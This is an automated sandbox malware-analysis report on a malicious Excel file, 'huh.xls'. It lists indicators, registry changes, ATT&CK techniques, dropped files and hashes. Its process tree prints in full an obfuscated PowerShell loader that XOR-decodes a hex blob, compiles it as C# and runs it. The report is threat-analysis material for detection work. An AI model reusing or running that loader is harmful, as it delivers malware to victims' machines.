8dec49167f634a101f631d4105b27a0e67fb7d2bd1cbd0105208965087a7b200

Analysis

max time kernel
83s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
17/04/2023, 09:02

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

huh.xls
Size

41KB
MD5

78ef5cb007602678d321e656d262cc31
SHA1

abde0acb2fa3a1f002bb138310fe9e180ffba279
SHA256

8dec49167f634a101f631d4105b27a0e67fb7d2bd1cbd0105208965087a7b200
SHA512

ec95acf6f396fd50fc802f3520a51624973492d310ab80fdac5a273ba6c3aee3cb9cfa66ef7ba47b0f80ac15f4799eb0d6358ef853f4150aaaafb25ac4832753
SSDEEP

768:zPjk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJlpXd0HjW5ympvmoqG//pNQJ+q8b9t:rjk3hbdlylKsgqopeJBWhZFGkE+cL2NM

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	1420	powershell.exe
5	1420	powershell.exe

Drops file in System32 directory 15 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfh009.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh00C.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh011.dat	OUTLOOK.EXE
File opened for modification	C:\Windows\SysWOW64\PerfStringBackup.INI	OUTLOOK.EXE
File created	C:\Windows\system32\perfc00A.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh00A.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc00C.dat	OUTLOOK.EXE
File created	C:\Windows\SysWOW64\PerfStringBackup.TMP	OUTLOOK.EXE
File created	C:\Windows\system32\perfh007.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc010.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc011.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc007.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc009.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh010.dat	OUTLOOK.EXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File opened for modification	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File created	C:\Windows\inf\Outlook\0009\outlperf.ini	OUTLOOK.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FE-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E6-0000-0000-C000-000000000046}\ = "_NavigationPane"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D0-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304D-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A0-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D8-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630B1-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063036-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309C-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EE-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CF-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DF-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063101-0000-0000-C000-000000000046}\ = "_Conversation"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307D-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CE-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D9-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630B0-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063079-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F7-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063087-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302B-0000-0000-C000-000000000046}\ = "ItemEvents_10"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C4-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304C-0000-0000-C000-000000000046}\ = "Exceptions"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063025-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309C-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FE-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006F025-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063002-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F9-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063006-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E0-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D6-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063098-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063023-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063070-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A0-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F0-0000-0000-C000-000000000046}\ = "_NavigationGroup"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DD-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F7-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067352-0000-0000-C000-000000000046}\ = "_OlkFrameHeader"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DD-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A2-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063005-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D6-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D8-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304F-0000-0000-C000-000000000046}\ = "ExplorerEvents"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E2-0000-0000-C000-000000000046}\ = "_CalendarSharing"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063083-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F8-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304E-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303D-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063040-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063041-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063103-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063025-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063104-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1932	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1420	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeShutdownPrivilege	676	OUTLOOK.EXE

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
676	OUTLOOK.EXE
676	OUTLOOK.EXE
676	OUTLOOK.EXE
676	OUTLOOK.EXE
676	OUTLOOK.EXE
676	OUTLOOK.EXE

Suspicious use of SendNotifyMessage 5 IoCs

pid	Process
676	OUTLOOK.EXE
676	OUTLOOK.EXE
676	OUTLOOK.EXE
676	OUTLOOK.EXE
676	OUTLOOK.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1932	EXCEL.EXE
1932	EXCEL.EXE
1932	EXCEL.EXE
676	OUTLOOK.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 676 wrote to memory of 1420	676	OUTLOOK.EXE	29
PID 676 wrote to memory of 1420	676	OUTLOOK.EXE	29
PID 676 wrote to memory of 1420	676	OUTLOOK.EXE	29
PID 676 wrote to memory of 1420	676	OUTLOOK.EXE	29
PID 1420 wrote to memory of 324	1420	powershell.exe	32
PID 1420 wrote to memory of 324	1420	powershell.exe	32
PID 1420 wrote to memory of 324	1420	powershell.exe	32
PID 1420 wrote to memory of 324	1420	powershell.exe	32
PID 324 wrote to memory of 1760	324	csc.exe	33
PID 324 wrote to memory of 1760	324	csc.exe	33
PID 324 wrote to memory of 1760	324	csc.exe	33
PID 324 wrote to memory of 1760	324	csc.exe	33

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\huh.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1932

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:676
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function wf59d8f {param($v5c68a)$zc8857='f8aa61';$b69b48='';for ($i=0; $i -lt $v5c68a.length;$i+=2){$l34c9a9=[convert]::ToByte($v5c68a.Substring($i,2),16);$b69b48+=[char]($l34c9a9 -bxor $zc8857[($i/2)%$zc8857.length]);}return $b69b48;}$tdd5855 = '134b080f511135411215535c5d4d12085856466b181242540b16331458450f55044f7f5f125d130e4662034a17085554150314125f5f01183218454503554f255f5001560e124258054b5a144558085f41324f42125d0c4f7f7e5d4d12085856466b181242540b162f04420a6b321114545d0f5b41025a50154b411153095f5953524d6a22540d285b41094a1549145a034a0f045a02541a4d2458451441310e5f5f120543265345364a0e027755024a041245134f651114545d0f5b41124250125102415349125d130f1678084c311544111559565557525310280f4261124a410e5457025e00501a42124a080f5111025d075904185d63250d5a780b480e1342194453041358540a0b53431a74084c1318665e0f56155c147d0959052d5f531459131814183b4814035a580518121557450f5b41044e45034a0f417f5f126815131645515a04580e024e4b15135f5f01180d0254525f0a485a6d750a54280c465e144c49435d541456040d05034414240f42431f680e0858455b1a3708444513590d31445e125d021514183b4814035a580518121557450f5b41044e45034a0f41545e0954410f5403505c56497f5f126815131652055a50541a642f5615314243465956575457510b4d145f5f1218115905545e094d0e4345464d080f4211170c5254550254115a3a725d0a710c1159431210432a5343085d0d52041f02540d431a74084c1318665e0f56155c146312542c0e40542b5d0c0e444844143204427d074b15244443094a5c07575d155d483c4545074c080216541e4c041358111057080516400059595507534e710f156645141812565555570c4d285845364c13414e065259524d5f5f121809020f505f0f485a46440454080216421259150855110f5615414c50525a505955194f43280f4261124a411401005201045c4206045d58590519115e54585209001043510104530953510e005e0d54515704521a48480d580010145607055f5d405c7f5f12681513186b034a0e484d78084c311544110a0056075203050512000105075b54494306570c58041a46000d58050e574e1a53560304570a51590004530a51560307540b50550301530f515202504411485a5f574e5459565055545b405c7f5f12681513186b034a0e484d642f56153142434640525654505b1034285845364c1348030a13510f151655550a57520b015d5107495853540e05561e5d5e0f070504524a40525654504a081955061d094d15415202540e52481f4a244115046d6c464b5052025253051a514e025714511950574a081958064c5d710f15664514180c025354050b5c2c57431550000d18700a540e027e760a5703005a1955115a2c57431550000d1872094818494500550c02541a014a5502045352551452480d400059595507534e5604161678084c311544190a00560752030516350e7f5f120e55491f1a5640515107534f140c025354050b4d521f0a1b451c1242430f56064144085f5a02040b74084e0813595f0b5d0f151876034c270e5a55034a310042594e7d0f175f4309560c045845486b110455580754270e5a55034a4f2046410a51020042580956250042504f184a41146d3a4e025304045f1a414a1646000d58050e574e1a555903555701515514185d5604161666035a220d5f54084c49481875094f0f0d5950027e080d5319115e54585209001043515305050954500705530803550f00510855510304040d59510e04020c07515004550c54550f04000851515504550c53550f04560954515504070d05550e040209585102134f1413580f53055d485a6643095b04124562125913157f5f0057411b5504515c05020b5f034f4131445e055d12126545074a15285857091013580f53055d485a6643095b0412451f354c001342191c5b5456525505115a135345134a0f41060a1b4814035a580518121557450f5b411242430f5606414157530105595019154c13085856465b545200055e00481a454514510f06165e045e050757005b1a075957505009435a454514510f061645515a04580e025b1a435a505e1410080f42110f05515a16585a5b545200055e004f2d535f014c095a5f1a5b0a481a5448125d41125706525902540b72095617044445486c0e234f450310025405075200594f6544044b15135f5f0110084d04184a0957480d45515a04580e024d0549025e5014114912570652590254685e045e050757003d10084e041843570307525707094f2d535f014c093c1f0a1b4a041543430818155654545f00525a4b4c';$tdd58552 = wf59d8f($tdd5855);Add-Type -TypeDefinition $tdd58552;[pe89a23]::za4b18c();
  2⤵
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1420
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kt0mx4dq.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:324
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A06.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3A05.tmp"
      4⤵
      PID:1760

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

Filesize
240KB

MD5
9395e2fd9ca9b736eafd84b8a04e686c

SHA1
4beb0de54940b08b3b3b2ab57c12656475e8d449

SHA256
10924381a798eadfdd609575b74f274f8d4d1ad611ab01fb67704696a1e64279

SHA512
052d019bd46e71c416a2c4d5ee82777671988ec2b59bd2da89354cf42de2e7a98d99115dcebbd2271331b41045b9a59d57bcc77094647f6139a9323bd9c9bcb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3A06.tmp

Filesize
1KB

MD5
9cbc362bca9d57589552c9c5672fae47

SHA1
b743109a9da83609caca2ed270ba902b8c83c372

SHA256
2252a3ceb5d9bebe23f106505c37a63fbf0e78f73aef514e0abe626d9b4b9a87

SHA512
b5e6089f147d7dad90329c5a09229a5794fb08edb005ecd95e1b6e96bb7d08b8ae5ab0b979f04f7b564bb1b3cf2f7d1bd418186a7af38718452e750634cee0b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\kt0mx4dq.dll

Filesize
5KB

MD5
0ef07db63ce61a81c341c7e6d1ad2a6f

SHA1
3daf8c915b64daf5bafb2d42c9133aa01d9bc200

SHA256
1a9f1359db651ee40d3094b5adc1a0808aae3277e37e858e4c19a024a5d04935

SHA512
7b4cb18788063c23fe2b061e9ab9bdfbaf2509dee57145717715f13afb1093cee95e86e784e8a0f39820252e09e2fb30bc4dfea8f52f5404116159a17a9fc80c

Download Submit
C:\Users\Admin\AppData\Local\Temp\kt0mx4dq.pdb

Filesize
11KB

MD5
e5a328f5145532d43c272489435349ae

SHA1
2b012ee912568a7c35a0d2cc8675e10c04b7a9a4

SHA256
03dfb00b5bd2234e5979bf7b71bdb657f38b67ec9683270106d530b82b374cc7

SHA512
b311976113afbaeec396edfe650c1217c4f9e4957a95949db8e89a4654dc7dee9c1942f8aafe3419d698025365bdc667db7988e487fa54011e3c98834385f3c9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC3A05.tmp

Filesize
652B

MD5
b760f3c4f11bc91e6df00da6b53a4281

SHA1
642577a35d139a58a267300f906b466a5ed42cf0

SHA256
0d3579b84845340687271764d6b4b2846da045ec1b60371736cd36f1ea628cf5

SHA512
9688de5bb00da43bc0e1fbd808ae9a57991689347ee963a6724c879888d809b7bbb87900e151b33ae53a1b3b3ab99bae24d39387af9436632b27fe57c272c3a7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kt0mx4dq.0.cs

Filesize
1KB

MD5
27f6b607e0e44b9188d08c2c037bf11f

SHA1
4468d894c16bb263cce0daba6c0680ce42549b9d

SHA256
ded2bc01a821bef56cac3847b4fc10739a52eefeed96f9e1427f3ec178ec1c99

SHA512
16541b67bf8a2895849c4421743763aed617adbcdb0bfc636d7400f350bdab4fb73f00ff8e630a80e32dce9d5791924413eaa5eb64f9c09fdbeaac5d1edf5079

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kt0mx4dq.cmdline

Filesize
309B

MD5
e97d238c7a1e0d0c89354c98dfc3826c

SHA1
642aff01c20a88b0a34ef33b6507c9606924df0a

SHA256
5a4d8beacb8ecef574dd93919b83595f14751929b48ca23c9123ced0ec8456ca

SHA512
b1eac497678f9cbce09695dc681689b08d1ac56af3e0e8f2aceb99ba7c39a8ca57005da9e6c13a18c269e035a458caf6ec950154c4475e5b16f25d864f563b56

Download Submit
